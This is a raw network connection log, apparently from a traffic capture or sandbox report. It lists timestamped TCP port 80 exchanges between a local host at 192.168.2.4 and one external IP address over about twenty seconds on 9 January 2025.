Jan 9, 2025 18:13:30.374332905 CET	50030	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:30.375094891 CET	50036	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:30.379419088 CET	80	50030	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:30.379956007 CET	80	50036	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:30.380023956 CET	50030	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:30.380064011 CET	50036	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:30.380183935 CET	50036	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:30.384958982 CET	80	50036	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:30.737354040 CET	50036	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:30.742466927 CET	80	50036	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:30.830621004 CET	80	50036	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:30.877959013 CET	50036	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:31.007013083 CET	80	50036	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:31.049761057 CET	50036	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:31.123080969 CET	50036	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:31.123759031 CET	50042	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:31.130523920 CET	80	50036	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:31.130532980 CET	80	50042	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:31.130573988 CET	50036	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:31.130645990 CET	50042	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:31.130754948 CET	50042	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:31.138524055 CET	80	50042	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:31.487361908 CET	50042	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:31.492588997 CET	80	50042	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:31.645390034 CET	80	50042	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:31.690454960 CET	50042	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:31.833555937 CET	80	50042	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:31.877888918 CET	50042	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:32.017676115 CET	50042	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:32.017967939 CET	50043	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:32.022996902 CET	80	50042	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:32.023010015 CET	80	50043	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:32.023075104 CET	50043	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:32.023164034 CET	50042	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:32.023644924 CET	50043	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:32.028552055 CET	80	50043	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:32.363137007 CET	50043	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:32.363755941 CET	50049	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:32.368565083 CET	80	50049	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:32.368635893 CET	50049	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:32.368732929 CET	50049	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:32.373512030 CET	80	50049	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:32.409285069 CET	80	50043	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:32.484232903 CET	50050	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:32.489159107 CET	80	50050	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:32.489238977 CET	50050	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:32.489368916 CET	50050	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:32.494118929 CET	80	50050	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:32.589402914 CET	80	50043	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:32.589461088 CET	50043	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:32.721724033 CET	50049	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:32.726639032 CET	80	50049	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:32.726769924 CET	80	50049	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:32.846810102 CET	50050	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:32.851742029 CET	80	50050	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:32.981329918 CET	80	50049	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:32.985371113 CET	80	50050	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:33.034121990 CET	50049	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:33.034230947 CET	50050	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:33.158469915 CET	80	50050	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:33.205964088 CET	50050	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:33.227612019 CET	80	50049	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:33.283338070 CET	50049	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:33.283391953 CET	50050	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:33.284713030 CET	50056	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:33.288403988 CET	80	50049	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:33.288635969 CET	80	50050	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:33.288726091 CET	50050	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:33.289064884 CET	50049	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:33.289587975 CET	80	50056	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:33.289968014 CET	50056	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:33.290235996 CET	50056	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:33.295023918 CET	80	50056	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:33.643590927 CET	50056	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:33.648420095 CET	80	50056	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:33.753385067 CET	80	50056	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:33.799732924 CET	50056	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:34.018043041 CET	80	50056	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:34.065418959 CET	50056	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:34.138547897 CET	50056	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:34.139317989 CET	50062	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:34.143575907 CET	80	50056	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:34.143627882 CET	50056	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:34.144171000 CET	80	50062	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:34.144249916 CET	50062	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:34.144354105 CET	50062	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:34.149084091 CET	80	50062	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:34.503066063 CET	50062	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:34.508059978 CET	80	50062	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:34.617136002 CET	80	50062	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:34.659102917 CET	50062	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:34.915641069 CET	80	50062	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:34.971631050 CET	50062	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:35.045500994 CET	50062	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:35.045783043 CET	50068	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:35.050560951 CET	80	50062	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:35.050604105 CET	80	50068	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:35.050671101 CET	50062	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:35.050725937 CET	50068	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:35.051045895 CET	50068	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:35.055864096 CET	80	50068	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:35.409157038 CET	50068	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:35.413990974 CET	80	50068	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:35.504405022 CET	80	50068	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:35.549853086 CET	50068	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:35.673516035 CET	80	50068	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:35.721694946 CET	50068	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:35.796292067 CET	50068	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:35.796891928 CET	50074	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:35.801712036 CET	80	50068	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:35.801817894 CET	50068	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:35.802052975 CET	80	50074	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:35.802114964 CET	50074	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:35.802252054 CET	50074	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:35.807065010 CET	80	50074	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:36.159199953 CET	50074	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:36.166531086 CET	80	50074	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:36.267564058 CET	80	50074	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:36.315334082 CET	50074	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:36.557599068 CET	80	50074	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:36.612206936 CET	50074	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:36.793962002 CET	50074	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:36.794670105 CET	50080	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:36.799072981 CET	80	50074	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:36.799149036 CET	50074	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:36.799525976 CET	80	50080	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:36.799654007 CET	50080	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:36.799756050 CET	50080	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:36.804615974 CET	80	50080	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:37.159346104 CET	50080	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:37.165003061 CET	80	50080	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:37.494257927 CET	80	50080	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:37.549761057 CET	50080	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:37.617573977 CET	80	50080	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:37.662583113 CET	50080	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:37.699961901 CET	80	50080	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:37.752835035 CET	50080	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:37.835115910 CET	50080	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:37.835916996 CET	50089	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:37.840158939 CET	80	50080	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:37.840271950 CET	50080	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:37.840792894 CET	80	50089	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:37.840898991 CET	50089	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:37.841362953 CET	50089	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:37.846158028 CET	80	50089	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:38.190434933 CET	50089	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:38.195357084 CET	80	50089	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:38.238034010 CET	50089	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:38.238651991 CET	50092	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:38.243522882 CET	80	50092	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:38.243608952 CET	50092	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:38.243683100 CET	50092	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:38.248502016 CET	80	50092	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:38.254472017 CET	80	50089	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:38.254823923 CET	50089	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:38.360454082 CET	50093	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:38.365744114 CET	80	50093	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:38.365976095 CET	50093	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:38.366111994 CET	50093	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:38.371397018 CET	80	50093	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:38.596677065 CET	50092	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:38.601577997 CET	80	50092	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:38.601640940 CET	80	50092	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:38.712737083 CET	80	50092	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:38.721720934 CET	50093	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:38.726560116 CET	80	50093	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:38.768471956 CET	50092	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:38.829473972 CET	80	50093	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:38.877954960 CET	50093	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:38.977658987 CET	80	50092	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:38.988194942 CET	80	50093	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:39.018582106 CET	50092	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:39.034111023 CET	50093	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:39.077235937 CET	80	50093	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:39.127938032 CET	50093	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:39.205560923 CET	50093	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:39.205656052 CET	50092	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:39.206763983 CET	50099	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:39.210540056 CET	80	50093	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:39.210639000 CET	50093	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:39.210989952 CET	80	50092	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:39.211118937 CET	50092	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:39.211631060 CET	80	50099	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:39.211739063 CET	50099	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:39.211869955 CET	50099	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:39.216661930 CET	80	50099	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:39.565416098 CET	50099	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:39.570354939 CET	80	50099	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:39.687201023 CET	80	50099	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:39.737206936 CET	50099	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:39.982497931 CET	80	50099	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:40.034082890 CET	50099	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:40.111579895 CET	50099	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:40.113033056 CET	50105	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:40.116725922 CET	80	50099	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:40.116869926 CET	50099	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:40.117924929 CET	80	50105	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:40.118005037 CET	50105	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:40.118190050 CET	50105	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:40.122986078 CET	80	50105	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:40.471638918 CET	50105	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:40.476460934 CET	80	50105	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:40.561299086 CET	80	50105	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:40.612266064 CET	50105	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:40.729887962 CET	80	50105	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:40.786580086 CET	50105	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:40.841481924 CET	50105	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:40.842237949 CET	50111	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:40.846755028 CET	80	50105	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:40.847074032 CET	80	50111	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:40.847929955 CET	50111	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:40.848125935 CET	50105	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:40.848162889 CET	50111	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:40.852982998 CET	80	50111	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:41.206295967 CET	50111	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:41.211227894 CET	80	50111	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:41.443304062 CET	80	50111	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:41.487190008 CET	50111	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:41.712837934 CET	80	50111	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:41.752835989 CET	50111	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:41.827408075 CET	50111	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:41.828191042 CET	50117	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:41.832559109 CET	80	50111	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:41.832643032 CET	50111	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:41.833107948 CET	80	50117	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:41.833183050 CET	50117	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:41.833280087 CET	50117	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:41.838113070 CET	80	50117	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:42.190629005 CET	50117	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:42.195574045 CET	80	50117	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:42.441467047 CET	80	50117	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:42.487329960 CET	50117	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:42.703344107 CET	80	50117	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:42.753046036 CET	50117	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:42.826610088 CET	50117	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:42.826816082 CET	50118	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:42.831656933 CET	80	50117	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:42.831675053 CET	80	50118	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:42.831758976 CET	50118	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:42.831767082 CET	50117	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:42.831862926 CET	50118	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:42.836663961 CET	80	50118	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:43.190541029 CET	50118	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:43.195377111 CET	80	50118	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:43.284492016 CET	80	50118	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:43.331046104 CET	50118	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:43.469650984 CET	80	50118	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:43.519336939 CET	50118	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:43.594222069 CET	50118	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:43.594342947 CET	50119	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:43.599206924 CET	80	50119	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:43.599585056 CET	50119	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:43.599731922 CET	50119	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:43.604798079 CET	80	50119	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:43.618382931 CET	80	50118	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:43.619357109 CET	50118	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:43.956227064 CET	50119	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:43.961092949 CET	80	50119	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:43.991539001 CET	50120	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:43.992022991 CET	50119	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:43.996558905 CET	80	50120	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:43.996624947 CET	50120	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:43.996736050 CET	50120	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:43.997051954 CET	80	50119	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:43.997112989 CET	50119	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:44.001518011 CET	80	50120	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:44.346693039 CET	50120	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:44.351632118 CET	80	50120	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:44.351644039 CET	80	50120	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:44.364386082 CET	50121	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:44.369230986 CET	80	50121	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:44.369290113 CET	50121	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:44.369479895 CET	50121	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:44.374305010 CET	80	50121	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:44.442431927 CET	80	50120	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:44.491236925 CET	50120	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:44.721671104 CET	50121	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:44.726536036 CET	80	50121	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:44.736268997 CET	80	50120	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:44.784101963 CET	50120	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:44.812774897 CET	80	50121	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:44.862226963 CET	50121	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:45.290565014 CET	80	50121	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:45.330959082 CET	50121	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:45.423405886 CET	80	50121	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:45.471607924 CET	50121	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:45.545007944 CET	50121	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:45.545121908 CET	50120	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:45.545783997 CET	50122	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:45.550028086 CET	80	50121	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:45.550334930 CET	80	50120	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:45.550410986 CET	50121	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:45.550426960 CET	50120	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:45.550553083 CET	80	50122	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:45.553471088 CET	50122	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:45.553550005 CET	50122	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:45.558604002 CET	80	50122	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:45.909188032 CET	50122	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:45.914026976 CET	80	50122	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:46.033624887 CET	80	50122	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:46.081063032 CET	50122	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:46.309616089 CET	80	50122	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:46.362334967 CET	50122	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:46.436928988 CET	50123	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:46.442008018 CET	80	50123	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:46.442198992 CET	50123	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:46.442445993 CET	50123	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:46.447866917 CET	80	50123	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:46.802495956 CET	50123	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:46.807334900 CET	80	50123	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:47.191937923 CET	80	50123	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:47.237219095 CET	50123	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:47.890285969 CET	80	50123	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:47.940402031 CET	50123	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:48.013842106 CET	50123	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:48.014570951 CET	50124	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:48.018827915 CET	80	50123	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:48.018883944 CET	50123	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:48.019351959 CET	80	50124	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:48.019407034 CET	50124	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:48.019498110 CET	50124	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:48.024286032 CET	80	50124	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:48.377918005 CET	50124	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:48.382714033 CET	80	50124	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:48.463836908 CET	80	50124	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:48.518456936 CET	50124	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:48.717967987 CET	80	50124	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:48.770489931 CET	50124	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:48.841718912 CET	50122	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:48.841829062 CET	50124	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:48.842451096 CET	50125	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:48.847021103 CET	80	50124	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:48.847413063 CET	80	50125	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:48.847506046 CET	50124	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:48.847516060 CET	50125	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:48.847629070 CET	50125	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:48.852364063 CET	80	50125	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:49.206350088 CET	50125	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:49.211225033 CET	80	50125	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:49.290859938 CET	80	50125	104.21.38.84	192.168.2.4
